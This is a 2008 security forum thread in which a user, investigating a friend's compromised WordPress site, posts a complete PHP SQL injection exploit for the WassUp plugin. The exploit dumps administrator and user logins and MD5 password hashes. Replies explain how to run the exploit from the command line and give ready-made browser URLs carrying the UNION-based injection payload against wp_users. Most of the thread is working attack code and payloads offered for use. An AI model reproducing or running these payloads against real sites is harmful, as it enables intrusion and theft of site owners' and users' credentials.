|
|
|
|
|
|
IT Security and Insecurity Portal |
|
|
How did they get the md5's from my friends website? |
|
Posted: Sat Feb 02, 2008 2:07 pm |
|
|
Vixje |
Active user |
|
|
Joined: Mar 25, 2006 |
Posts: 35 |
|
|
|
|
|
|
|
Hi there,
My friend's website got compromised. And i'm trying to figure out how. Now he has been using Wordpress, and I found a certain plugin he uses which has a exploit available on the net. Below you will find the exploit.
It seems to me this is PHP language. How can I test this script to see if its the one used to get md5's from his website? I tried saving the script as a php file and uploading it to my website to execute it, but it wont work because I somehow need to provide the parameters like target host and Wordpress directory. I'm lost here, any help would be greatly appreciated.
Thanks a lot in advance.
Code: |
<?
# WordPress WassUp plugin v 1.4.3 Sql Injection Exploit
#
# Plugin Homepage-http://www.wpwp.org/
#
# Found by:enter_the_dragon
#
# Tested successfully on v 1.4-1.4.3
# (lower versions are possibly vulnerable too just check the source and modify the query as needed)
# Vuln code
#
# -In spy.php
#
# if (isset($_GET['to_date'])) $to_date = htmlentities(strip_tags($_GET['to_date']));
# ...........
# spyview($from_date,$to_date,$rows);
#
# -In main.php
#
# function spyview ($from_date="",$to_date="",$rows="999") {
# ...........
# $qryC = $wpdb->get_results("SELECT id, wassup_id, max(timestamp) as max_timestamp, ip, hostname, searchengine,
# urlrequested, agent, referrer, spider, username, comment_author FROM $table_name WHERE timestamp BETWEEN $from_date AND
# $to_date GROUP BY id ORDER BY max_timestamp DESC");
#
# Exploit
#
# $from_date and $to_date GET variables used in an sql query without being properly filtered so we can inject sql code
# using a query like ./spy.php?to_date=-1 group by id union select 1,2,3,4,5,6,7,8,9,10,11,12 from table
#
# If exploit is successful Wordpress administrator and users logins and md5 hashed passwords are retrieved
#
#
echo "\n";
echo "------WordPress WassUp plugin v 1.4.3 Sql Injection Exploit-------"."\n";
echo "-------------------coded by : enter_the_dragon--------------------"."\n";
echo "------------------------------------------------------------------"."\n";
if ($argc!=3)
{
echo " Usage: $argv[0] target_host wp_path \n";
echo " target_host: Your target ex www.target.com \n";
echo " wp_path: WordPress path ex /blog/ or / if wordpress is installed in the web servers root folder";
echo "\n";
exit;
}
$query=$argv[1];
$query.=$argv[2];
$query.="wp-content/plugins/wassup/spy.php?";
$query.="to_date=-1%20group%20by%20id%20union%20select%20null,null,null,concat(0x7c,user_login,0x7c,user_pass,0x7c),null,null,null,null,null,null,null,null%20%20from%20wp_users";
if(function_exists(curl_init))
{
$ch = curl_init("http://$query");
curl_setopt($ch, CURLOPT_HEADER,true);
curl_setopt( $ch, CURLOPT_RETURNTRANSFER,true);
curl_setopt($ch, CURLOPT_TIMEOUT,10);
curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 6.0;Windows NT 5.1)");
$html=curl_exec($ch);
$returncode = curl_getinfo($ch,CURLINFO_HTTP_CODE);
curl_close($ch);
if ($returncode==404) exit ("Vulnerable script isnt there....Check your path :| \n");
$pattern="/\|(.*)?\|([a-z0-9]{32})\|/";
if(preg_match_all($pattern,$html,$matches))
{
$usernames=$matches[1];
$userpasses=$matches[2];
for($i=0;$i<count($usernames);$i++)
{
echo "User Login:$usernames[$i]\n" ;
echo "User Pass :$userpasses[$i]\n\n";
}
}
else
{
exit ("Exploit Failed :( \n");
}
}
else
exit("Error:Libcurl isnt installed \n");
?>
# milw0rm.com [2008-01-30]
|
|
|
|
|
|
|
|
|
|
Posted: Sat Feb 02, 2008 2:28 pm |
|
|
gibbocool |
Advanced user |
|
|
Joined: Jan 22, 2008 |
Posts: 208 |
|
|
|
|
|
|
|
I think you need to run it from a CLI.
eg: php file.php target_host wp_path |
|
|
|
|
Posted: Sat Feb 02, 2008 2:49 pm |
|
|
Vixje |
Active user |
|
|
Joined: Mar 25, 2006 |
Posts: 35 |
|
|
|
|
|
|
|
Thanks, i think that was it!
The script doesnt seem to work though unfortunally.
Nomatter what url or path I provide, always the error Error:Libcurl isnt installed. |
|
|
|
|
|
|
|
|
Posted: Sat Feb 02, 2008 3:28 pm |
|
|
waraxe |
Site admin |
|
|
Joined: May 11, 2004 |
Posts: 2407 |
Location: Estonia, Tartu |
|
|
|
|
|
|
It is windows? Then go to php.ini file and find this:
Code: |
;extension=php_curl.dll
|
Uncomment this entry:
Code: |
extension=php_curl.dll
|
By the way - this exploit is SO easy ... Why don't you try it directly from browser?
Try this:
Code: |
http://www.victim.com/wp-content/plugins/wassup/spy.php?to_date=-1+OR
|
Can you see sql error message? If you see error message, then sql injection may be possible.
Then next try this:
Code: |
http://www.victim.com/wp-content/plugins/wassup/spy.php?to_date=-1+GROUP+BY+id+UNION+SELECT+null,null,null,CONCAT(0x7c,user_login,0x7c,user_pass,0x7c),null,null,null,null,null,null,null,null+FROM+wp_users
|
You should see what you are looking for or there will be sql error, if something is wrong. |
|
|
|
|
|
www.waraxe.us Forum Index -> Newbies corner
You cannot post new topics in this forum You cannot reply to topics in this forum You cannot edit your posts in this forum You cannot delete your posts in this forum You cannot vote in polls in this forum
|
All times are GMT
Page 1 of 1
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|